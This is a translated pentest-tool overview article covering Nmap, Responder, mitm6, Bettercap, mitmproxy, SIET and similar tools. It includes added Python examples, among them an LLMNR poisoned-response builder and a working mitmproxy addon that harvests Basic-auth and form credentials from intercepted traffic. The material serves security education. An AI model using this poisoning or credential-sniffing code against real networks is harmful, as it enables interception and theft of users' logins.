Network tools, or where to start as a pentester?

A toolkit for the novice pentester: here is a short overview of the key tools that come in handy when testing an internal network. These tools are already in active use by specialists of many kinds, so it is worth everyone knowing what they can do and being comfortable with them.

Nmap

Nmap is an open-source network scanner and one of the best-known tools among security specialists and system administrators. It is used mainly for port scanning, but beyond that it has a large number of useful functions, which is what makes Nmap a real all-in-one harvester for network reconnaissance.

In addition to checking for open/closed ports, nmap can identify the service listening on an open port and its version, and sometimes helps to determine the OS. Nmap has scripting support (NSE, the Nmap Scripting Engine). Using scripts you can check various services for vulnerabilities (provided, of course, that a script exists for them, or you can always write your own) or brute-force passwords for various services.

Nmap therefore lets you build a detailed map of the network, obtain a lot of information about the services running on the hosts, and also check for specific vulnerabilities. Nmap also has flexible scan settings: you can set the scan speed, the number of threads, the number of groups to scan, and so on. It is convenient for scanning small networks and indispensable for spot-scanning individual hosts.

Pros:

  • It works fast on a small range of hosts;
  • Flexible settings: options can be combined so as to get the most informative data in an acceptable time;
  • Parallel scanning: the list of target hosts is split into groups, the groups are scanned in turn, and parallel scanning is used within each group. The split into groups is also a small drawback (see below);
  • Predefined sets of scripts for different tasks: you do not have to spend a lot of time picking specific scripts, you just specify script categories;
  • Output of results: five different formats, including XML, which can be imported into other tools;

Cons:

  • Scanning by groups of hosts: information about any host is unavailable until scanning of the whole group has finished. This can be mitigated by setting in the options the maximum group size and the maximum time to wait for a response to a probe before retrying or giving up;
  • When scanning, Nmap sends SYN packets to the target port and waits for any response packet, or for a timeout if there is no response. This negatively affects the performance of the scanner as a whole compared with asynchronous scanners (for example, zmap or masscan);
  • When scanning large networks, using flags that speed up the scan (--min-rate, --min-parallelism) can produce false negatives, with open ports missing from a host. These options should also be used with care, since a high packet rate can lead to an unintended DoS.
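
As an added example (it is not part of the original article), here is a small Python parser for Nmap's XML output (`-oX`), the format mentioned above as importable into other tools. The XML document embedded below is constructed to look like the output of a `-sV` scan of two hosts; it is not a real scan, and the addresses and host name are made up. The parser keeps only hosts that are up and ports that are open, so the result can be handed straight to the next tool in the chain.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout nmap writes with -oX (trimmed to the elements used here).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.0.0.0/28">
<host><status state="up" reason="echo-reply"/>
<address addr="10.0.0.5" addrtype="ipv4"/>
<hostnames><hostname name="fileserver.corp.example" type="PTR"/></hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
<service name="ssh" product="OpenSSH" version="8.2p1"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
<service name="microsoft-ds"/></port>
<port protocol="tcp" portid="8080"><state state="filtered" reason="no-response"/>
<service name="http-proxy"/></port>
</ports></host>
<host><status state="down" reason="no-response"/>
<address addr="10.0.0.6" addrtype="ipv4"/></host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: {"hostname": str|None, "ports": [...]}} for hosts that are up.

    Only ports whose <state> is "open" are kept; filtered and closed ports are dropped.
    """
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:                 # IPv6-only host records carry addrtype="ipv6"
            addr_el = host.find("address[@addrtype='ipv6']")
        if addr_el is None:
            continue
        name_el = host.find("hostnames/hostname")
        entry = {"hostname": name_el.get("name") if name_el is not None else None,
                 "ports": []}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            svc_attrs = svc.attrib if svc is not None else {}
            # product/version are only present when -sV managed to identify the service
            version = " ".join(v for v in (svc_attrs.get("product"), svc_attrs.get("version")) if v)
            entry["ports"].append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc_attrs.get("name"),
                "version": version or None,
            })
        hosts[addr_el.get("addr")] = entry
    return hosts


def targets_for_service(hosts, service_name):
    """Build 'ip:port' targets for every open port running the named service,
    the kind of list you would feed to a brute-forcer or a follow-up NSE run."""
    return [f"{ip}:{p['port']}" for ip, h in hosts.items()
            for p in h["ports"] if p["service"] == service_name]


if __name__ == "__main__":
    scan = parse_nmap_xml(SAMPLE_NMAP_XML)
    for ip, h in scan.items():
        print(ip, h["hostname"] or "-",
              [(p["port"], p["service"], p["version"]) for p in h["ports"]])
    print("ssh targets:", targets_for_service(scan, "ssh"))
```

Replace `SAMPLE_NMAP_XML` with the contents of a real `-oX` file to use it on your own scan; the same structure is what other tools read when they import Nmap XML.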

Zmap

Zmap (not to be confused with ZenMap) is also an open-source scanner, created as a faster alternative to Nmap.

Unlike nmap, when Zmap sends a SYN packet it does not wait for the reply to come back but carries on scanning, while at the same time listening for replies from all hosts, so it effectively keeps no connection state. When the reply to a SYN packet arrives, Zmap works out from the packet contents which port is open on which host. In addition, Zmap sends only one SYN packet per scanned port. It is also possible to use PF_RING to scan large networks quickly, if you happen to have a 10-Gigabit interface and a compatible network card at hand.
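
To make the "keeps no connection state" point concrete, here is an added Python illustration (it is not ZMap's code and not from the article) of how a stateless scanner can tell which host and port a SYN-ACK belongs to without a per-probe table: the initial sequence number of each SYN is derived from a keyed hash of the target address and port, so a reply is accepted only if its acknowledgement number equals that value plus one. A real scanner ties more packet fields (such as the source port) to the same hash; this example keeps only the sequence-number check. The secret key, the target list and the simulated responder are all constructed for the example, and no packets are sent.

```python
import hashlib
import hmac
import socket
import struct

MASK32 = 0xFFFFFFFF


class StatelessSynScanner:
    """Simplified model of a stateless SYN scanner (illustration, not ZMap's implementation)."""

    def __init__(self, secret):
        # Per-scan secret; a real scanner draws this from a CSPRNG at start-up.
        self.secret = secret

    def probe_seq(self, dst_ip, dst_port):
        """Initial sequence number for the SYN sent to (dst_ip, dst_port).
        It is a pure function of the target, so nothing has to be remembered."""
        msg = socket.inet_aton(dst_ip) + struct.pack("!H", dst_port)
        digest = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return struct.unpack("!I", digest[:4])[0]

    def is_valid_reply(self, src_ip, src_port, ack):
        """A genuine SYN-ACK (or RST) acknowledges our ISN + 1 (mod 2^32)."""
        expected = (self.probe_seq(src_ip, src_port) + 1) & MASK32
        return ack == expected


def simulated_target(dst_ip, dst_port, seq, open_ports):
    """Stand-in for the scanned host: the reply it would send to a SYN.
    Constructed for the example; open_ports is a set of (ip, port) tuples."""
    flags = "SYN-ACK" if (dst_ip, dst_port) in open_ports else "RST"
    return (flags, dst_ip, dst_port, (seq + 1) & MASK32)


def run_scan(scanner, targets, open_ports, extra_replies=()):
    """Send one SYN per target, then classify every reply that comes back.
    extra_replies lets the caller inject stray or forged packets to show they are dropped."""
    replies = [simulated_target(ip, port, scanner.probe_seq(ip, port), open_ports)
               for ip, port in targets]
    replies.extend(extra_replies)
    found_open, dropped = set(), 0
    for flags, src_ip, src_port, ack in replies:
        if not scanner.is_valid_reply(src_ip, src_port, ack):
            dropped += 1          # not ours: forged, stale, or from another scan
            continue
        if flags == "SYN-ACK":
            found_open.add((src_ip, src_port))
    return found_open, dropped


if __name__ == "__main__":
    scanner = StatelessSynScanner(b"constructed-per-scan-secret")
    targets = [("10.0.0.5", 22), ("10.0.0.5", 80), ("10.0.0.7", 445)]
    open_ports = {("10.0.0.5", 22), ("10.0.0.7", 445)}
    # A forged "port 80 is open" reply with the wrong ack number is rejected.
    forged = ("SYN-ACK", "10.0.0.5", 80, (scanner.probe_seq("10.0.0.5", 80) + 2) & MASK32)
    print(run_scan(scanner, targets, open_ports, [forged]))
```

The same property is why a stateless scanner can be pointed at a large network without its memory growing with the number of outstanding probes, and why its own replies can be told apart from unrelated or injected packets.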

Pros:

  • Scan speed;
  • Zmap generates Ethernet frames itself, bypassing the system TCP/IP stack;
  • Ability to use PF_RING;
  • ZMap randomises the order of targets so as to spread the load evenly on the scanned side;
  • Ability to integrate with ZGrab (a tool for collecting information about services at the application layer, L7).

Cons:

  • It can cause denial of service on network equipment, for example taking down intermediate routers, despite the spread-out load, because all packets pass through the same route.

Masscan

Masscan is, surprisingly, also an open-source scanner, created with a single goal: scanning the Internet as fast as possible (in under 6 minutes at a rate of around 10 million packets/s). In essence it works on the same principle as Zmap, only faster.

Pros:

  • The syntax is similar to Nmap, and the program also supports some Nmap-compatible options;
  • Speed of operation: one of the fastest asynchronous scanners.
  • Flexible scanning mechanism: resuming an interrupted scan, distributing the load across several devices (as in Zmap).

Cons:

  • As with Zmap, the load on the network itself is extremely high, which can lead to DoS;
  • By default there is no ability to scan at the L7 application layer;

Nessus

Nessus is a scanner for automating the checking and detection of known vulnerabilities in a system. Although it is closed-source, there is a free version, Nessus Home, which lets you scan up to 16 IP addresses with the same speed and the same detailed analysis as the paid version.

It can identify vulnerable versions of services or servers, detect errors in system configuration, and run dictionary brute-forcing of passwords. It can be used to check the correctness of service settings (mail, updates, etc.), as well as in preparation for a PCI DSS audit. In addition, you can give Nessus host credentials (SSH or a domain account in Active Directory) and the scanner will get access to the host and run checks on it directly; this option is called a credentialed scan. It is convenient for companies that audit their own networks.

Pros:

  • Separate scenarios for each vulnerability, with a database that is updated constantly;
  • Output of results: plain text, XML, HTML and LaTeX;
  • The Nessus API lets you automate scanning processes and the retrieval of results;
  • Credentialed scanning: you can use Windows or Linux credentials to check for missing updates or other vulnerabilities;
  • Ability to write your own built-in security modules: the scanner has its own scripting language, NASL (Nessus Attack Scripting Language);
  • You can schedule regular scanning of the local network; thanks to this, the Information Security team will be aware of all changes in the security configuration, the appearance of new hosts, and the use of dictionary or default passwords.

Cons:

  • There may be disruptions to the operation of the scanned systems; you need to work carefully when the safe checks option is disabled;
  • The commercial version is not free.

Net-Creds

Net-Creds is a Python tool for collecting passwords and hashes, as well as other information, for example visited URLs, downloaded files and other data from traffic, both in real time during a MiTM attack and from previously saved PCAP files. It is suitable for a quick and superficial analysis of large volumes of traffic, for example during network MiTM attacks, when time is limited and manual analysis with Wireshark takes a long time.

Pros:

  • Service detection is based on packet analysis rather than on the port number used;
  • Easy to use;
  • A wide range of extracted data, including logins and passwords for the FTP, POP, IMAP, SMTP and NTLMv1/v2 protocols, as well as information from HTTP requests such as login forms and basic auth;

network-miner

network-miner is an analogue of Net-Creds in terms of how it works, but with greater functionality; for example, it can extract files transferred over the SMB protocol. Like Net-Creds, it is convenient when you need to analyse a large volume of traffic quickly. It also has a user-friendly graphical interface.

Pros:

  • Graphical interface;
  • Visualisation and grouping of the data make traffic analysis easier and faster.

Cons:

  • The trial version has limited functionality.

mitm6

mitm6 is a tool for attacks on IPv6 (the SLAAC attack). IPv6 takes priority in Windows OS (and generally in other operating systems too), and in the default configuration the IPv6 interface is enabled; this allows an attacker to install their own DNS server on the victim using Router Advertisement packets, after which the attacker is able to spoof the victim's DNS. It is perfect for carrying out a relay attack together with the ntlmrelayx utility, which lets you attack Windows networks successfully.

Pros:

  • It works great on many networks precisely because of the standard configuration of Windows hosts and networks;

Responder

Responder is a tool for spoofing the broadcast name resolution protocols (LLMNR, NetBIOS, mDNS). An indispensable tool in Active Directory networks. Besides spoofing, it can intercept NTLM authentication; it also comes with a set of tools for collecting information and carrying out NTLM-Relay attacks.

Pros:

  • By default it brings up many servers with support for NTLM authentication: SMB, MSSQL, HTTP, HTTPS, LDAP, FTP, POP3, IMAP, SMTP;
  • Allows DNS spoofing in the case of MITM attacks (ARP spoofing, etc.);
  • Fingerprinting of the hosts that made the broadcast request;
  • Analyze mode: for passively monitoring requests;
  • The format of the captured NTLM authentication hashes is compatible with John the Ripper and Hashcat.

Cons:

  • When running under Windows, binding to port 445 (SMB) involves certain difficulties (it requires stopping the corresponding services and rebooting);
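
The broadcast-name-resolution spoofing that Responder performs can be seen in miniature in the added Python example below (illustrative code, not Responder's own and not from the article). LLMNR reuses the DNS message layout on UDP port 5355 (multicast 224.0.0.252): a host that cannot resolve a name through DNS asks the link, and whoever answers first wins. The code builds such a query, then builds the poisoned answer a listener like Responder would send, pointing the requested name at the attacker's address, and finally parses that answer the way the victim would. The host name, transaction ID and addresses are constructed for the example, and nothing is sent on the network.

```python
import socket
import struct

LLMNR_PORT = 5355              # UDP port LLMNR queries are multicast to
LLMNR_MCAST = "224.0.0.252"    # IPv4 multicast group for LLMNR
FLAG_RESPONSE = 0x8000         # QR bit in the DNS-style header


def _encode_name(name):
    """Encode 'fileshare01' or 'host.corp' as DNS labels terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.split(".")) + b"\x00"


def _decode_name(data, off):
    """Decode labels starting at off; LLMNR does not use DNS name compression."""
    labels = []
    while True:
        length = data[off]
        off += 1
        if length == 0:
            return ".".join(labels), off
        labels.append(data[off:off + length].decode("ascii"))
        off += length


def build_llmnr_query(name, txid):
    """What a Windows client multicasts when DNS cannot resolve `name`."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # id, flags, qd, an, ns, ar
    return header + _encode_name(name) + struct.pack("!HH", 1, 1)   # type A, class IN


def parse_llmnr_query(data):
    txid, flags, qdcount, *_ = struct.unpack("!HHHHHH", data[:12])
    if flags & FLAG_RESPONSE or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = _decode_name(data, 12)
    qtype, qclass = struct.unpack("!HH", data[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": data[12:off + 4]}


def build_poisoned_answer(query, attacker_ip, ttl=30):
    """The poisoner's reply: same txid, the question echoed, one A record -> attacker_ip."""
    q = parse_llmnr_query(query)
    if q["qtype"] != 1:
        return None                       # this example only answers A queries
    header = struct.pack("!HHHHHH", q["txid"], FLAG_RESPONSE, 1, 1, 0, 0)
    rr = (_encode_name(q["name"])
          + struct.pack("!HHIH", 1, 1, ttl, 4)      # type A, class IN, TTL, rdlength
          + socket.inet_aton(attacker_ip))
    return header + q["question"] + rr


def parse_llmnr_answer(data):
    """Victim side: read the first A record out of a response."""
    txid, flags, qdcount, ancount, *_ = struct.unpack("!HHHHHH", data[:12])
    if not flags & FLAG_RESPONSE or ancount < 1:
        raise ValueError("not an LLMNR answer")
    off = 12
    for _ in range(qdcount):              # skip the echoed question section
        _, off = _decode_name(data, off)
        off += 4
    name, off = _decode_name(data, off)
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
    off += 10
    rdata = data[off:off + rdlen]
    return {"txid": txid, "name": name, "ttl": ttl,
            "address": socket.inet_ntoa(rdata) if rtype == 1 and rdlen == 4 else None}


if __name__ == "__main__":
    query = build_llmnr_query("fileshare01", txid=0x1A2B)   # mistyped share name (constructed)
    answer = build_poisoned_answer(query, "10.0.0.99")        # attacker's address (constructed)
    print(parse_llmnr_query(query))
    print(parse_llmnr_answer(answer))
```

Because the victim accepts the first matching transaction ID, the poisoner's race is against the legitimate silence; the defensive counterpart is simply to disable LLMNR and NetBIOS name resolution by policy so that no such query is ever sent.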

Evil_Foca

Evil Foca is a tool for testing various network attacks in IPv4 and IPv6 networks. It scans the local network, identifying devices, routers and their network interfaces, after which various attacks can be carried out on the network participants.

Pros:

  • Convenient for carrying out MITM attacks (ARP spoofing, DHCP ACK injection, SLAAC attack, DHCP spoofing);
  • You can carry out DoS attacks: via ARP spoofing in IPv4 networks, via SLAAC DoS in IPv6 networks;
  • DNS hijacking is possible;
  • Easy to use, user-friendly graphical interface.

Cons:

  • It works only under Windows.

Bettercap

Bettercap is a powerful framework for analysing and attacking networks, and here we are also talking about attacks on wireless networks, BLE (Bluetooth Low Energy) and even MouseJack attacks on wireless HID devices. In addition, it contains functionality for collecting information from traffic (similar to net-creds). In general, a Swiss army knife (all in one). More recently it also has a graphical web-based interface.

Pros:

  • Credential sniffer: you can catch visited URLs and HTTPS hosts, HTTP authentication, and credentials for many different protocols;
  • Lots of built-in MITM attacks;
  • Modular transparent HTTP(S) proxy: you can handle the traffic according to your needs;
  • Built-in HTTP server;
  • Support for caplets: files that let complex and automated attacks be described in a scripting language.

Cons:

  • Some modules (for example ble.enum) are only partially supported on macOS and Windows, and some are designed for Linux only (packet.proxy).

gateway_finder

gateway_finder is a Python script that helps to detect possible gateways on the network. It is useful for checking segmentation or for finding hosts that can route to the subnet you need or to the Internet. Suitable for internal pentests when you need to quickly check for unauthorised routes or routes into other internal local networks.

Pros:

  • Easy to use and to customise.

mitmproxy

mitmproxy is an open-source tool for analysing traffic protected by SSL/TLS. mitmproxy is convenient for intercepting and modifying protected traffic, with some caveats of course: the tool does not break SSL/TLS itself, it works as a proxy whose certificate the client must trust. It is used when you need to intercept and record changes in SSL/TLS-protected traffic. It consists of mitmproxy (for proxying traffic), mitmdump (similar to tcpdump, but for HTTP(S) traffic) and mitmweb (a web interface for mitmproxy).

Pros:

  • It works with various protocols and also supports modifying various formats, from HTML to Protobuf;
  • Python API: lets you write scripts for non-standard tasks;
  • It can work in transparent proxy mode with traffic interception.

Cons:

  • The dump format is not compatible with anything; it is hard to grep, you have to write scripts;
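
The Python API mentioned above is used through addon scripts loaded with `mitmproxy -s script.py` (or `mitmdump -s script.py`), which call hook methods such as `request(flow)` on every HTTP flow. Below is an added example of such an addon (it is not mitmproxy's own code and not from the article) that pulls Basic-auth headers and form logins out of intercepted requests and keeps them as plain dicts, which also addresses the grep complaint: the findings can be printed or dumped as JSON. So that it runs without mitmproxy installed, the `demo_flows` helper builds constructed stand-in flow objects exposing the same attributes a real `HTTPFlow` does (`request.method`, `request.pretty_url`, `request.headers`, `request.content`); the URLs and credentials in them are made up.

```python
import base64
import json
from urllib.parse import parse_qsl

USER_FIELDS = {"user", "username", "login", "email", "uid"}
PASS_FIELDS = {"pass", "password", "passwd", "pwd"}


class CredLogger:
    """mitmproxy addon: `request` is the hook mitmproxy calls for every client request."""

    def __init__(self):
        self.findings = []

    def request(self, flow):
        req = flow.request
        # mitmproxy's Headers are case-insensitive, a plain dict is not; normalise once.
        headers = {k.lower(): v for k, v in req.headers.items()}

        auth = headers.get("authorization", "")
        if auth.lower().startswith("basic "):
            try:
                decoded = base64.b64decode(auth[6:]).decode("utf-8", "replace")
            except ValueError:            # binascii.Error is a ValueError subclass
                decoded = None
            if decoded is not None:
                user, _, password = decoded.partition(":")
                self.findings.append({"url": req.pretty_url, "kind": "basic-auth",
                                      "user": user, "password": password})

        if req.method == "POST" and "application/x-www-form-urlencoded" in headers.get("content-type", ""):
            form = dict(parse_qsl(req.content.decode("utf-8", "replace")))
            user = next((v for k, v in form.items() if k.lower() in USER_FIELDS), None)
            password = next((v for k, v in form.items() if k.lower() in PASS_FIELDS), None)
            if password is not None:
                self.findings.append({"url": req.pretty_url, "kind": "form",
                                      "user": user, "password": password})

    def as_json(self):
        return json.dumps(self.findings, indent=1)


addons = [CredLogger()]   # this module-level list is how mitmproxy discovers addons


class FakeRequest:
    """Constructed stand-in with the attributes of mitmproxy's Request used above."""
    def __init__(self, method, url, headers, content=b""):
        self.method, self.pretty_url, self.headers, self.content = method, url, headers, content


class FakeFlow:
    def __init__(self, request):
        self.request = request


def demo_flows():
    """Two constructed requests a victim browser might send through the proxy."""
    basic = FakeFlow(FakeRequest(
        "GET", "https://intranet.example/admin/",
        {"Authorization": "Basic " + base64.b64encode(b"alice:Winter2024!").decode()}))
    form = FakeFlow(FakeRequest(
        "POST", "https://portal.example/login",
        {"Content-Type": "application/x-www-form-urlencoded"},
        b"username=bob&password=s3cret&remember=1"))
    return [basic, form]


if __name__ == "__main__":
    logger = CredLogger()
    for flow in demo_flows():
        logger.request(flow)
    print(logger.as_json())
```

With the stand-in classes removed the same file can be loaded directly by mitmproxy; the `addons` list is what it looks for, and `flow.request` then is the real request object.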

SIET

SIET (Smart Install Exploitation Tool) is a tool for exploiting the capabilities of the Cisco Smart Install protocol. It can retrieve and modify the configuration, as well as take control of a Cisco device. If you managed to retrieve the configuration of a Cisco device, you can check it with CCAT; that tool is useful for analysing the security configuration of Cisco devices.

Pros:

Using the Cisco Smart Install protocol lets you:

  • Change the tftp server address on the client device by sending a single malformed TCP packet;
  • Copy the device configuration file;
  • Change the device configuration, for example by adding a new user;
  • Update the IOS image on the device;
  • Execute an arbitrary set of commands on the device. This is a new feature that works only on IOS versions 3.6.0E and 15.2(2)E;

Cons:

  • It works with a limited set of Cisco devices, and you also need a "white" (publicly routable) IP to receive a response from the device, or you must be on the same network as the device;

yersinia

yersinia is an L2 attack framework designed to exploit security flaws in various L2 network protocols.

Pros:

  • It lets you attack STP, CDP, DTP, DHCP, HSRP, VTP and others.

Cons:

  • Not a user-friendly interface.

proxychains

proxychains is a tool that lets you redirect an application's traffic through a specified SOCKS proxy.

Pros:

  • It helps to redirect the traffic of applications that cannot work with proxies on their own;

In this article we took a brief look at the pros and cons of the main tools for internal network pentesting. Stay tuned: we plan to publish similar collections in the future, on web, databases and mobile applications, and we will definitely write about those too.

Share your favourite utilities in the comments!

Source: www.habr.com
